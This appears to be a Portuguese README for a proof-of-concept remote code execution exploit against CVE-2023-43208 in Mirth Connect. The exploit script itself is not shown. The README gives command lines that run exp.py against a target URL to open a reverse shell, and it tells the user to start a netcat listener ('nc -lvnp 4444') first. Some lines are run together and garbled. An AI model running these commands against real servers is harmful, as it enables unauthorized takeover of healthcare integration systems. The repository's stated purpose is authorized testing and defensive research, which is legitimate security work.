
PoC para exploração de RCE da CVE-2023-43208.
Script Python de prova de conceito visando CVE-2023-43208 no Mirth Connect.
Use apenas em ambientes que você possui ou para os quais tem autorização explícita para testar. Este repositório destina-se à pesquisa, validação e testes defensivos de segurança. O autor não se responsabiliza por qualquer uso indevido ou dano causado por esta ferramenta.
exp.py é uma versão de dependência mínima do PoC que:
/api/server/version4.4.1/api/users se o alvo parecer vulnerávelO script usa HTTPS por padrão e pode ser alternado para HTTP com --http.
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]
-u, --url: URL ou host do Mirth Connect alvo-lh, --lhost: Host/IP local para a conexão reversa-lp, --lport: Porta local de escuta--http: Força HTTP em vez de HTTPS (o padrão é HTTPS)Inicie um listener primeiro:
nc -lvnp 4444
Execute o script:
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444
Para um alvo somente HTTP:
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http
4.4.1.K3ysTr0K3R e Chocapikkpredyy